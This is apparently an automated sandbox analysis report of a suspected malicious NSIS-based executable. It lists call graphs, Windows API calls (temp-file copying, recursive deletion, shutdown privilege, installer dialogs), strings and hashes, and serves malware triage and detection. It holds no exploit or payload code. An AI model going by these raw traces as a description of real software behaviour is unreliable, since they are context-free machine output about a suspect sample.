72ed2192 5137->5139 5145 72ed1ddb 5137->5145 5137->5150 5138->5135 5140 72ed21b4 GetModuleHandleW 5139->5140 5139->5150 5143 72ed21da 5140->5143 5144 72ed21c5 LoadLibraryW 5140->5144 5141->5147 5142->5135 5234 72ed161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5143->5234 5144->5143 5144->5150 5145->5150 5230 72ed122c 5145->5230 5147->5135 5148 72ed222c 5148->5150 5152 72ed2239 lstrlenW 5148->5152 5149->5150 5160 72ed2134 lstrcpyW 5149->5160 5150->5092 5235 72ed161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5152->5235 5233 72ed121b GlobalAlloc 5153->5233 5156 72ed21ec 5156->5148 5163 72ed2216 GetProcAddress 5156->5163 5157 72ed2253 5157->5150 5158->5135 5228 72ed158f GlobalSize GlobalAlloc 5158->5228 5159->5135 5160->5150 5162->5135 5163->5148 5164 72ed206d 5164->5092 5167 72ed23ac 5165->5167 5166 72ed122c GlobalAlloc lstrcpynW 5166->5167 5167->5166 5169 72ed24d5 GlobalFree 5167->5169 5170 72ed247f GlobalAlloc CLSIDFromString 5167->5170 5171 72ed2454 GlobalAlloc WideCharToMultiByte 5167->5171 5174 72ed249e 5167->5174 5237 72ed12ba 5167->5237 5169->5167 5172 72ed17cf 5169->5172 5170->5169 5171->5169 5172->5102 5172->5103 5172->5115 5174->5169 5241 72ed26b8 5174->5241 5177 72ed2abe 5175->5177 5176 72ed2b63 EnumWindows 5180 72ed2b81 5176->5180 5177->5176 5179 72ed2c4d 5179->5115 5244 72ed2a56 5180->5244 5182 72ed2367 5181->5182 5183 72ed2372 GlobalAlloc 5182->5183 5184 72ed17c8 5182->5184 5183->5182 5184->5094 5189 72ed2754 5185->5189 5186 72ed27ef GlobalAlloc 5190 72ed2812 5186->5190 5187 72ed2802 5188 72ed2808 GlobalSize 5187->5188 5187->5190 5188->5190 5189->5186 5189->5187 5190->5119 5192 72ed2d42 5191->5192 5193 72ed2d82 GlobalFree 5192->5193 5248 72ed121b GlobalAlloc 5194->5248 5196 72ed25ec MultiByteToWideChar 5201 72ed2573 5196->5201 5197 72ed261f lstrcpynW 5197->5201 5198 72ed260e StringFromGUID2 5198->5201 5199 72ed2632 wsprintfW 5199->5201 5200 72ed2656 GlobalFree 5200->5201 5201->5196 5201->5197 5201->5198 5201->5199 5201->5200 5202 72ed268b GlobalFree 5201->5202 5203 72ed1272 2 API calls 5201->5203 5249 72ed12e1 5201->5249 5202->5108 5203->5201 5253 72ed121b GlobalAlloc 5205->5253 5207 72ed15b9 5208 72ed15c6 2 API calls 5207->5208 5209 72ed15c3 5208->5209 5210 72ed1272 5209->5210 5211 72ed127b GlobalAlloc lstrcpynW 5210->5211 5212 72ed12b5 GlobalFree 5210->5212 5211->5212 5212->5122 5214 72ed15ff lstrcpyW 5213->5214 5215 72ed15d2 wsprintfW 5213->5215 5218 72ed1618 5214->5218 5215->5218 5218->5120 5220 72ed1891 5219->5220 5221 72ed253a 5219->5221 5220->5128 5220->5129 5221->5220 5222 72ed2556 GlobalFree 5221->5222 5222->5221 5224 72ed1272 2 API calls 5223->5224 5225 72ed155e 5224->5225 5225->5123 5226->5133 5227->5135 5229 72ed15ad 5228->5229 5229->5158 5236 72ed121b GlobalAlloc 5230->5236 5232 72ed123b lstrcpynW 5232->5150 5233->5164 5234->5156 5235->5157 5236->5232 5238 72ed12c1 5237->5238 5239 72ed122c 2 API calls 5238->5239 5240 72ed12df 5239->5240 5240->5167 5242 72ed271c 5241->5242 5243 72ed26c6 VirtualAlloc 5241->5243 5242->5174 5243->5242 5245 72ed2a61 5244->5245 5246 72ed2a66 GetLastError 5245->5246 5247 72ed2a71 5245->5247 5246->5247 5247->5179 5248->5201 5250 72ed130c 5249->5250 5251 72ed12ea 5249->5251 5250->5201 5251->5250 5252 72ed12f0 lstrcpyW 5251->5252 5252->5250 5253->5207 5997 402a35 5998 402c1f 17 API calls 5997->5998 5999 402a3b 5998->5999 6000 402a72 5999->6000 6001 402a4d 5999->6001 6002 40288b 5999->6002 6000->6002 6003 40640a 17 API calls 6000->6003 6001->6002 6005 40632f wsprintfW 6001->6005 6003->6002 6005->6002 6006 401735 6007 402c41 17 API calls 6006->6007 6008 40173c SearchPathW 6007->6008 6009 4029e6 6008->6009 6010 401757 6008->6010 6010->6009 6012 4063e8 lstrcpynW 6010->6012 6012->6009 6013 4014b8 6014 4014be 6013->6014 6015 401389 2 API calls 6014->6015 6016 4014c6 6015->6016 6017 401db9 GetDC 6018 402c1f 17 API calls 6017->6018 6019 401dcb GetDeviceCaps MulDiv ReleaseDC 6018->6019 6020 402c1f 17 API calls 6019->6020 6021 401dfc 6020->6021 6022 40640a 17 API calls 6021->6022 6023 401e39 CreateFontIndirectW 6022->6023 6024 402592 6023->6024 6025 40283b 6026 402843 6025->6026 6027 402847 FindNextFileW 6026->6027 6028 402859 6026->6028 6027->6028 6029 4029e6 6028->6029 6031 4063e8 lstrcpynW 6028->6031 6031->6029 5308 72ed2993 5309 72ed29e3 5308->5309 5310 72ed29a3 VirtualProtect 5308->5310 5310->5309

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 31 4035d5-4035d9 28->31 32 4035ce-4035d3 28->32 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 31->33 34 4035db-4035df 31->34 32->31 32->32 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 52 4036b2-4036b3 36->52 53 4036b4-4036ba 36->53 41 4035f2-4035fa 37->41 42 40360b-403644 37->42 38->39 58 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->58 54 403814-403824 call 4039e6 OleUninitialize 39->54 55 403769-40376f 39->55 46 403601 41->46 47 4035fc-4035ff 41->47 48 403661-40369b 42->48 49 403646-40364b 42->49 46->42 47->42 47->46 48->36 57 40369d-4036a1 48->57 49->48 56 40364d-403655 49->56 52->53 53->28 59 4036c0 53->59 75 40394a-403950 54->75 76 40382a-40383a call 405a4e ExitProcess 54->76 60 403804-40380b call 403ad8 55->60 61 403775-403780 call 405cea 55->61 63 403657-40365a 56->63 64 40365c 56->64 57->36 65 4036c2-4036d0 call 4063e8 57->65 58->39 58->54 67 4036d5 59->67 74 403810 60->74 77 403782-4037b7 61->77 78 4037ce-4037d8 61->78 63->48 63->64 64->48 65->67 67->29 74->54 80 403952-403968 GetCurrentProcess OpenProcessToken 75->80 81 4039ce-4039d6 75->81 84 4037b9-4037bd 77->84 87 403840-403854 call 4059b9 lstrcatW 78->87 88 4037da-4037e8 call 405dc5 78->88 82 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 80->82 83 40399e-4039ac call 4067c2 80->83 85 4039d8 81->85 86 4039dc-4039e0 ExitProcess 81->86 82->83 101 4039ba-4039c5 ExitWindowsEx 83->101 102 4039ae-4039b8 83->102 91 4037c6-4037ca 84->91 92 4037bf-4037c4 84->92 85->86 99 403861-40387b lstrcatW lstrcmpiW 87->99 100 403856-40385c lstrcatW 87->100 88->54 103 4037ea-403800 call 4063e8 * 2 88->103 91->84 96 4037cc 91->96 92->91 92->96 96->78 99->54 105 40387d-403880 99->105 100->99 101->81 106 4039c7-4039c9 call 40140b 101->106 102->101 102->106 103->60 108 403882-403887 call 40591f 105->108 109 403889 call 40599c 105->109 106->81 117 40388e-40389c SetCurrentDirectoryW 108->117 109->117 118 4038a9-4038d2 call 4063e8 117->118 119 40389e-4038a4 call 4063e8 117->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 129 40393e-403945 call 4061ae 126->129 127->126 128 403907-403927 call 4061ae call 40640a call 4059d1 127->128 128->126 138 403929-403930 CloseHandle 128->138 129->54 138->126
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                                  • GetVersion.KERNEL32 ref: 004034CE
                                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                                  • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                                  • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                                  • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00000020,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                    • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                    • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                  • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                                  • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                                  • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\b5BQbAhwVD.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                                  • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                                  • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                  • String ID: "C:\Users\user\Desktop\b5BQbAhwVD.exe"$.tmp$1033$C:\Users\user\AppData\Local\Iw$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\b5BQbAhwVD.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                  • API String ID: 3441113951-1494625539
                                                                                                                  • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                                  • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                                  • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                                  • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 152 40514f-405156 148->152 155 405080-405087 149->155 156 405073-40507a 149->156 153 404ed9 150->153 154 404edc-404ef9 call 40640a SendMessageW * 2 150->154 151->147 157 404f01-404f2d call 40435f * 2 151->157 162 4051c7-4051cf 152->162 163 405158-40515e 152->163 153->154 154->151 159 405089-40508c 155->159 160 4050fc-4050ff 155->160 156->152 156->155 196 404f33-404f39 157->196 197 404ff8-40500b GetWindowLongW SetWindowLongW 157->197 168 405097-4050ac call 404d1a 159->168 169 40508e-405095 159->169 160->152 164 405101-40510b 160->164 166 4051d1-4051d7 SendMessageW 162->166 167 4051d9-4051e0 162->167 171 405164-40516e 163->171 172 4053af-4053c1 call 4043c6 163->172 174 40511b-405125 164->174 175 40510d-405119 SendMessageW 164->175 166->167 176 4051e2-4051e9 167->176 177 405214-40521b 167->177 168->160 195 4050ae-4050bf 168->195 169->160 169->168 171->172 180 405174-405183 SendMessageW 171->180 174->152 182 405127-405131 174->182 175->174 183 4051f2-4051f9 176->183 184 4051eb-4051ec ImageList_Destroy 176->184 187 405371-405378 177->187 188 405221-40522d call 4011ef 177->188 180->172 189 405189-40519a SendMessageW 180->189 191 405142-40514c 182->191 192 405133-405140 182->192 193 405202-40520e 183->193 194 4051fb-4051fc GlobalFree 183->194 184->183 187->172 190 40537a-405381 187->190 214 40523d-405240 188->214 215 40522f-405232 188->215 199 4051a4-4051a6 189->199 200 40519c-4051a2 189->200 190->172 202 405383-4053ad ShowWindow GetDlgItem ShowWindow 190->202 191->152 192->152 193->177 194->193 195->160 204 4050c1-4050c3 195->204 205 404f3c-404f43 196->205 203 405011-405015 197->203 201 4051a7-4051c0 call 401299 SendMessageW 199->201 200->199 200->201 201->162 202->172 208 405017-40502a ShowWindow call 404394 203->208 209 40502f-405037 call 404394 203->209 210 4050c5-4050cc 204->210 211 4050d6 204->211 212 404fd9-404fec 205->212 213 404f49-404f71 205->213 208->172 209->140 224 4050d2-4050d4 210->224 225 4050ce-4050d0 210->225 228 4050d9-4050f5 call 40117d 211->228 212->205 219 404ff2-404ff6 212->219 226 404f73-404fa9 SendMessageW 213->226 227 404fab-404fad 213->227 220 405281-4052a5 call 4011ef 214->220 221 405242-40525b call 4012e2 call 401299 214->221 216 405234 215->216 217 405235-405238 call 404d9a 215->217 216->217 217->214 219->197 219->203 241 405347-40535b InvalidateRect 220->241 242 4052ab 220->242 246 40526b-40527a SendMessageW 221->246 247 40525d-405263 221->247 224->228 225->228 226->212 229 404fc0-404fd6 SendMessageW 227->229 230 404faf-404fbe SendMessageW 227->230 228->160 229->212 230->212 241->187 245 40535d-40536c call 404ced call 404cd5 241->245 243 4052ae-4052b9 242->243 248 4052bb-4052ca 243->248 249 40532f-405341 243->249 245->187 246->220 253 405265 247->253 254 405266-405269 247->254 251 4052cc-4052d9 248->251 252 4052dd-4052e0 248->252 249->241 249->243 251->252 256 4052e2-4052e5 252->256 257 4052e7-4052f0 252->257 253->254 254->246 254->247 259 4052f5-40532d SendMessageW * 2 256->259 257->259 260 4052f2 257->260 259->249 260->259
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                                  • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                                  • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                  • String ID: $M$N
                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                  • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                                  • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                                  • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                                  • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 511 405afa-405b20 call 405dc5 514 405b22-405b34 DeleteFileW 511->514 515 405b39-405b40 511->515 516 405cb6-405cba 514->516 517 405b42-405b44 515->517 518 405b53-405b63 call 4063e8 515->518 520 405c64-405c69 517->520 521 405b4a-405b4d 517->521 524 405b72-405b73 call 405d09 518->524 525 405b65-405b70 lstrcatW 518->525 520->516 523 405c6b-405c6e 520->523 521->518 521->520 526 405c70-405c76 523->526 527 405c78-405c80 call 40672b 523->527 528 405b78-405b7c 524->528 525->528 526->516 527->516 535 405c82-405c96 call 405cbd call 405ab2 527->535 531 405b88-405b8e lstrcatW 528->531 532 405b7e-405b86 528->532 534 405b93-405baf lstrlenW FindFirstFileW 531->534 532->531 532->534 536 405bb5-405bbd 534->536 537 405c59-405c5d 534->537 551 405c98-405c9b 535->551 552 405cae-405cb1 call 405450 535->552 540 405bdd-405bf1 call 4063e8 536->540 541 405bbf-405bc7 536->541 537->520 539 405c5f 537->539 539->520 553 405bf3-405bfb 540->553 554 405c08-405c13 call 405ab2 540->554 543 405bc9-405bd1 541->543 544 405c3c-405c4c FindNextFileW 541->544 543->540 549 405bd3-405bdb 543->549 544->536 548 405c52-405c53 FindClose 544->548 548->537 549->540 549->544 551->526 555 405c9d-405cac call 405450 call 4061ae 551->555 552->516 553->544 556 405bfd-405c06 call 405afa 553->556 564 405c34-405c37 call 405450 554->564 565 405c15-405c18 554->565 555->516 556->544 564->544 568 405c1a-405c2a call 405450 call 4061ae 565->568 569 405c2c-405c32 565->569 568->544 569->544
                                                                                                                  APIs
                                                                                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405B23
                                                                                                                  • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405B6B
                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405B8E
                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405B94
                                                                                                                  • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405BA4
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                  • String ID: "C:\Users\user\Desktop\b5BQbAhwVD.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                  • API String ID: 2035342205-908781105
                                                                                                                  • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                                  • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                                  • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                                  • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
